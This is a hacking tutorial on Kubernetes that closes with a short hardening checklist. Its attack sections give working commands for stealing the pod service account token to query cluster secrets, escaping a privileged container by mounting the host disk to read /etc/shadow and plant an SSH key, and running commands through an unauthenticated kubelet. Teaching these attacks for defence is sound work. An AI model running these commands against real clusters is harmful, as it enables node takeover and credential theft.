Kubernetes (K8s) Security: The Hacking Guide

Kubernetes (K8s) has won the container war. It powers 80% of modern cloud infrastructure. But K8s is notoriously complex to secure. It has an API server, internal networking, overlay DNS, and a permission system (RBAC) that is easy to misconfigure. For an attacker, a compromised container is just the beginning. The goal is Cluster Admin.

Architecture Overview

1. Master Node (Control Plane): The brain. Runs the API Server (TCP 6443), Etcd (Database), and Scheduler.
2. Worker Nodes: The muscle. They run the actual Pods (applications).
3. Kubelet: The agent on every worker node that talks to the Master.
4. Sidecars: Helper containers running alongside the main app.

1. The Token Steal (Lateral Movement)

Every Pod needs to talk to the K8s API sometimes (e.g., to find other services). K8s automatically mounts a "Service Account Token" into every pod by default.
Path: `/var/run/secrets/kubernetes.io/serviceaccount/token`
If you compromise a web app (via RCE or SQLi), your first move is to read this file.

            # 1. Steal the token
            TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
            
            # 2. Talk to the API (Internal DNS is usually 'kubernetes.default')
            curl -k -H "Authorization: Bearer $TOKEN" https://kubernetes.default/api/v1/secrets
            
            # 3. Analyze Permissions with 'kubectl-who-can' (if installed) or manually trying verbs.
        

2. Pod Breakout (Container Escape)

You are root inside the container, but you want to be root on the Host Node.
Privileged Containers: The most common vulnerability. If a pod has `securityContext.privileged: true`, it has access to the host's devices.

Exploit (The Mount trick):
You can mount the Host's hard drive into your container.

            mkdir /host
            mount /dev/sda1 /host
            
            # Now you can read the host's /etc/shadow or SSH keys
            cat /host/etc/shadow
            
            # Or add your own SSH key
            echo "ssh-rsa AAA..." >> /host/root/.ssh/authorized_keys
            
            # SSH into the host for full node compromise.
            ssh root@HOST_IP
        

3. RBAC Abuse (Role-Based Access Control)

K8s uses Roles and RoleBindings. Some permissions are dangerous:
- pods/create: The ability to create a pod is equivalent to Root. Why? Because you can create a privileged pod that mounts the root filesystem (see above).
- secrets/get: Read any secret (DB Passwords, AWS Keys).
- daemonsets/create: Run code on EVERY node in the cluster.

4. Misconfigured Kubelets (Anonymous Access)

The Kubelet runs on port 10250.
By default, it requires authentication. But often, admins misconfigure it to allow Anonymous Authentication.
If you find port 10250 open and unauthenticated, you can run commands on that node without credentials.

curl -k https://target-node:10250/run/namespace/pod/container -d "cmd=id"

5. Sidecar Injection

Service Meshes like Istio or Linkerd inject a "Sidecar" proxy (Envoy) into every pod.
If you compromise the sidecar configuration, you can intercept all traffic (mTLS) entering or leaving the pod.

Hardening Checklist

1. Disable Automounting: `automountServiceAccountToken: false` in PodSpecs. Only mount it where needed.
2. Network Policies: Default Deny. Only allow whitelisted traffic (Web -> DB).
3. Pod Security Standards (PSS): Block `privileged` mode at the cluster level.
4. Scan Images: Use tools like Trivy or Clair in your CI/CD pipeline to catch vulnerabilities before deployment.